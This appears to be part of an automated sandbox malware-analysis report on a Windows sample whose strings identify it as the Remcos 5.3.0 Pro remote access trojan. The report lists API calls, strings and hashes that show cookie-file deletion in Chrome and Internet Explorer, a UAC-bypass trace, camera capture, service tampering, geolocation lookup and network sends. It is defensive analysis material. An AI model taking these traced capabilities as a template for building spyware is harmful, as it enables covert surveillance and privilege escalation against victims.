  • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
• RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
Strings
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: CloseEnumInfoOpenQuerysend
• String ID: TUFTUF$>G$DG$DG
• API String ID: 3114080316-344394840
• Opcode ID: de4befe685273e7bf067e3fe47780df676ebf89a32a955f1e6b39ea8039125ff
• Instruction ID: 977689a643a5ec5a4c60f988ad8168500f8ba0dfdc14b2429fd77a11b5167535
• Opcode Fuzzy Hash: de4befe685273e7bf067e3fe47780df676ebf89a32a955f1e6b39ea8039125ff
• Instruction Fuzzy Hash: 9041A2316042009BC224F635D8A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
APIs
• _ValidateLocalCookies.LIBCMT ref: 00437ABB
• ___except_validate_context_record.LIBVCRUNTIME ref: 00437AC3
• _ValidateLocalCookies.LIBCMT ref: 00437B51
• __IsNonwritableInCurrentImage.LIBCMT ref: 00437B7C
• _ValidateLocalCookies.LIBCMT ref: 00437BD1
Strings
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
• Opcode ID: 47e26074ed3df67517ea761fc7c27dd00097028ab85dfbf9f1f14e41715e449f
• Instruction ID: 71a827b8039fc8fef17eb0172cb9efd804432aff4b2936af944e1c8a38ed202f
• Opcode Fuzzy Hash: 47e26074ed3df67517ea761fc7c27dd00097028ab85dfbf9f1f14e41715e449f
• Instruction Fuzzy Hash: 07410870A04209DBCF20EF29C884A9FBBB4AF08328F149156E8556B352D739EE01CF95
APIs
  • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
  • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
  • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
• ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
• PathFileExistsA.SHLWAPI(?), ref: 0040B779
Strings
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
• String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
• API String ID: 1133728706-4073444585
• Opcode ID: bbd59c4342a3f048f0a7499dd9cd327f959f912607a0dc40202ba9ee31ab275b
• Instruction ID: c183ecd3189b8021203cc80da109e2de7a31ac9d6a13988019f9cddb43f3bc3e
• Opcode Fuzzy Hash: bbd59c4342a3f048f0a7499dd9cd327f959f912607a0dc40202ba9ee31ab275b
• Instruction Fuzzy Hash: 84216D71900219A6CB04F7B2DCA69EE7764AE95318F40013FA902771D2EB7C9A49C6DE
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a689da314200d05c27aed096e5791327431372d8d81dee2cdc260883e4ab0459
• Instruction ID: c456bd3af877b6cafd4b53f13a87e342c7fa5de46f767ee01c057a6e18c8cad8
• Opcode Fuzzy Hash: a689da314200d05c27aed096e5791327431372d8d81dee2cdc260883e4ab0459
• Instruction Fuzzy Hash: 401102B1508615FBDB206F729C4593B7BACEF82772B20016FFC05C6242DA3CC801D669
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
• int.LIBCPMT ref: 0040FC0F
  • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
  • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
• std::_Facet_Register.LIBCPMT ref: 0040FC4B
• std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
• __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
Strings
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
• String ID: p[G
• API String ID: 2536120697-440918510
• Opcode ID: 34d2c97419ff9ea43b4d99934c17e21ff42c81eb248cc24d2bbad1ad966fea40
• Instruction ID: 57388c14a05e53b5f50c1e79e3c37d993a50775a9f2b0ccff9e8b1bf96635e0f
• Opcode Fuzzy Hash: 34d2c97419ff9ea43b4d99934c17e21ff42c81eb248cc24d2bbad1ad966fea40
• Instruction Fuzzy Hash: BD110232904519A7CB10FBA5D8469EEB7289E84358F20007BF805B72C1EB7CAF45C78D
APIs
• InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A54E
• InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A564
• InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A57D
• InternetCloseHandle.WININET(00000000), ref: 0041A5C3
• InternetCloseHandle.WININET(00000000), ref: 0041A5C6
Strings
• http://geoplugin.net/json.gp, xrefs: 0041A55E
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: Internet$CloseHandleOpen$FileRead
• String ID: http://geoplugin.net/json.gp
• API String ID: 3121278467-91888290
• Opcode ID: 277b3accc4d7b5025d2c7427303433e7431fc8b467990071231497c86fa6234c
• Instruction ID: 987b679836a9d55d587b89d74e0435f254c545d991055b4d64d2ada4334a4818
• Opcode Fuzzy Hash: 277b3accc4d7b5025d2c7427303433e7431fc8b467990071231497c86fa6234c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C111C4311093126BD224EA169C45DBF7FEDEF86365F00043EF905E2192DB689848C6BA
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0044FA32: _free.LIBCMT ref: 0044FA5B
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0044FD39
                                                                                                                                                                                                                                              • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                                                                                                                                              • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0044FD44
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0044FD4F
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0044FDA3
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0044FDAE
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0044FDB9
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0044FDC4
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                            • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                                                                                                                                                            • Instruction ID: b610107d28af63220697d29f7fc6270dd0ec529a0d2d9973413717ad3690abbb
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B5116071581B44ABE520F7B2CC07FCB77DDDF02708F404C2EB29E76052EA68B90A4655
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\Desktop\iGhDjzEiDU.exe), ref: 00406835
                                                                                                                                                                                                                                              • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                                                                                                                                                                                                                                              • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 0040688E
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: InitializeObjectUninitialize_wcslen
                                                                                                                                                                                                                                            • String ID: C:\Users\user\Desktop\iGhDjzEiDU.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                                                                                                                                                                            • API String ID: 3851391207-459172085
                                                                                                                                                                                                                                            • Opcode ID: 37e49e74ace5e8c7de8c35aba96b6244217e4573d21f95b04fe8e6107b657e82
                                                                                                                                                                                                                                            • Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 37e49e74ace5e8c7de8c35aba96b6244217e4573d21f95b04fe8e6107b657e82
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
                                                                                                                                                                                                                                            • int.LIBCPMT ref: 0040FEF2
                                                                                                                                                                                                                                              • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                                                                                                                                                                              • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 0040FF2E
                                                                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                                                                                                                                            • String ID: h]G
                                                                                                                                                                                                                                            • API String ID: 2536120697-1579725984
                                                                                                                                                                                                                                            • Opcode ID: f9aa0e65a7bbfdd7a7f79a788d404fc3f4b750e419fadc6b529989e89958da83
                                                                                                                                                                                                                                            • Instruction ID: faa6495482ffb760010bfa20be6f485864068761b5f97391b19e5f0bde606c56
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f9aa0e65a7bbfdd7a7f79a788d404fc3f4b750e419fadc6b529989e89958da83
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 10119D3190041AABCB24FBA5C8468DDB7699E85718B20057FF505B72C1EB78AE09C789
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0040B2EE
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • [Chrome Cookies not found], xrefs: 0040B308
                                                                                                                                                                                                                                            • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                                                                                                                                                                                                                                            • [Chrome Cookies found, cleared!], xrefs: 0040B314
                                                                                                                                                                                                                                            • UserProfile, xrefs: 0040B2B4
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DeleteErrorFileLast
                                                                                                                                                                                                                                            • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                                                                                                                                                            • API String ID: 2018770650-304995407
                                                                                                                                                                                                                                            • Opcode ID: f29ab34f5f3b23139b2c689574f5439d44e644a4acc68cd0207f5b0faff05a8e
                                                                                                                                                                                                                                            • Instruction ID: 57831ae66bbe87b328e3caf482cfdb9a18bfb77b2c204d956758bc207329a0f7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f29ab34f5f3b23139b2c689574f5439d44e644a4acc68cd0207f5b0faff05a8e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ED01A23164410557CB0477B5DD6B8AF3624ED50708F60013FF802B22E2FE3A9A0586CE
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • AllocConsole.KERNEL32(00474358), ref: 0041BEC9
                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,00000000), ref: 0041BEE2
                                                                                                                                                                                                                                            • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BF07
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: Console$AllocOutputShowWindow
• String ID: Remcos v$5.3.0 Pro$CONOUT$
• API String ID: 2425139147-2527699604
• Opcode ID: 0969bb2dc50103f751eab8b76b07649baec71243ec5d0269df0f19859633e99b
• Instruction ID: 29466b5f89b818b32aee09a22b3208d506810ef61d6e100b210d0f7536d9046d
• Opcode Fuzzy Hash: 0969bb2dc50103f751eab8b76b07649baec71243ec5d0269df0f19859633e99b
• Instruction Fuzzy Hash: 3F0121B1980304BAD600FBF29D4BFDD37AC9B14705F5004277648EB193E6BCA554466D
Strings
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID:
• String ID: (CG$C:\Users\user\Desktop\iGhDjzEiDU.exe$BG
• API String ID: 0-1807716158
• Opcode ID: d1be4aec57154437973d558091bbe471e33116169eb7d1567a4c56866b781843
• Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
• Opcode Fuzzy Hash: d1be4aec57154437973d558091bbe471e33116169eb7d1567a4c56866b781843
• Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C
APIs
• __allrem.LIBCMT ref: 00439799
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397B5
• __allrem.LIBCMT ref: 004397CC
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397EA
• __allrem.LIBCMT ref: 00439801
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043981F
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
• String ID:
• API String ID: 1992179935-0
• Opcode ID: b8fade3388712e20a6f67c03e6901a2274372487572bf270bb9750812de2a36e
• Instruction ID: 580a0d75dc01f3f4b0c8d364acae3af6b21ca74026922d198920ae34195595c3
• Opcode Fuzzy Hash: b8fade3388712e20a6f67c03e6901a2274372487572bf270bb9750812de2a36e
• Instruction Fuzzy Hash: 8581FC71A01B069BE724AE69CC82B5F73A8AF89368F24512FF411D7381E7B8DD018758
APIs
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: __cftoe
• String ID:
• API String ID: 4189289331-0
• Opcode ID: 9c401b065f3bfa052971b83b22631fc3acfeb1e9040e9a62fafe9f4e5745fff8
• Instruction ID: 51d3defa9bee42a6449c1cbae1767e96f335fc55d8793b788aa7c8c1dec457a3
• Opcode Fuzzy Hash: 9c401b065f3bfa052971b83b22631fc3acfeb1e9040e9a62fafe9f4e5745fff8
• Instruction Fuzzy Hash: DE510A72900205ABFB249F598C81FAF77A9EFC9324F25421FF814A6291DB3DDD01866D
APIs
• Sleep.KERNEL32(00000000), ref: 00403E8A
  • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
Strings
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: H_prologSleep
• String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
• API String ID: 3469354165-462540288
• Opcode ID: a9f7d0d3fadaaa2ab5302d74800214878727d50abf2ff1e7d6e11163ed2cafe4
• Instruction ID: a615deab89d52a04eef9df102bd8b4982dd8b49b1eab8c4ad016fc0191aaad38
• Opcode Fuzzy Hash: a9f7d0d3fadaaa2ab5302d74800214878727d50abf2ff1e7d6e11163ed2cafe4
• Instruction Fuzzy Hash: E941A330A0420196CA14FB79C816AAD3A655B45704F00413FF809A73E2EF7C9A85C7CF
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E0C
• OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E20
• CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E2D
• ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419517), ref: 00419E62
• CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E74
• CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E77
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: Service$CloseHandle$Open$ChangeConfigManager
• String ID:
• API String ID: 493672254-0
• Opcode ID: 02b88ba3e7911ce8c5ead6755d78df319317ed7b9ebc03ba342fc4c032229c57
• Instruction ID: 40159264159f5a90cd52f9b689d0e8cb5e0ea154c732c405bcbf7063391161e0
• Opcode Fuzzy Hash: 02b88ba3e7911ce8c5ead6755d78df319317ed7b9ebc03ba342fc4c032229c57
• Instruction Fuzzy Hash: 09016D311083107AE3118B34EC1EFBF3B5CDB41B70F00023BF626922D1DA68CE8581A9
APIs
• GetLastError.KERNEL32(?,?,00437E0D,004377C1), ref: 00437E24
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E32
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E4B
• SetLastError.KERNEL32(00000000,?,00437E0D,004377C1), ref: 00437E9D
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
• Opcode ID: 8677577c8e37d81537f7299acd8b5f5a9cc683e2404a7ed47504fd76d00458cf
• Instruction ID: 127a8aaeb23cc4eddae083ca6fcd73be4c6f1963697d6e79a1959115bdf772ac
• Opcode Fuzzy Hash: 8677577c8e37d81537f7299acd8b5f5a9cc683e2404a7ed47504fd76d00458cf
• Instruction Fuzzy Hash: 6701B57211D3159EE63427757C87A272B99EB0A779F20127FF228851E2EF2D4C41914C
APIs
• GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
• _free.LIBCMT ref: 00446F06
• _free.LIBCMT ref: 00446F2E
• SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F3B
• SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
• _abort.LIBCMT ref: 00446F4D
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3160817290-0
                                                                                                                                                                                                                                            • Opcode ID: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                                                                                                                                                                                            • Instruction ID: 1b4467ed9408e6c3233579f8e1b56ac98d0768551ab8ff32c5b7efb0424b8365
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B1F0F93560870027F61273797D46A6F15669BC37B6B26013FF909A2292EE2D8C06411F
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C3F
                                                                                                                                                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C53
                                                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C60
                                                                                                                                                                                                                                            • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C6F
                                                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C81
                                                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C84
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 221034970-0
                                                                                                                                                                                                                                            • Opcode ID: b7b71ddbdcb9800aa748b97a69a48af82292e20b181655901ef109c96cd029b9
                                                                                                                                                                                                                                            • Instruction ID: 508c6a04514e5737773cd2f196b8466aacbf0489f3ca208dfe1df169d6e4b917
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b7b71ddbdcb9800aa748b97a69a48af82292e20b181655901ef109c96cd029b9
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 93F0F6325403147BD3116B25EC89EFF3BACDB85BA1F000036F941921D2DB68CD4685F5
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D41
                                                                                                                                                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D55
                                                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D62
                                                                                                                                                                                                                                            • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D71
                                                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D83
                                                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D86
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 221034970-0
                                                                                                                                                                                                                                            • Opcode ID: e9ecc3ae41f79f47d3bdca3e192fe5417343a180787152718365ee8199a3ebfc
                                                                                                                                                                                                                                            • Instruction ID: e3947c2d1caeee04707242a29777fdfa1156a9fa4bc9e6dc5536219c00a7af20
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e9ecc3ae41f79f47d3bdca3e192fe5417343a180787152718365ee8199a3ebfc
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 88F0C2325002146BD2116B25FC49EBF3AACDB85BA1B00003AFA06A21D2DB38CD4685F9
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DA6
                                                                                                                                                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DBA
                                                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DC7
                                                                                                                                                                                                                                            • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DD6
                                                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DE8
                                                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DEB
                                                                                                                                                                                                                                            Memory Dump Source
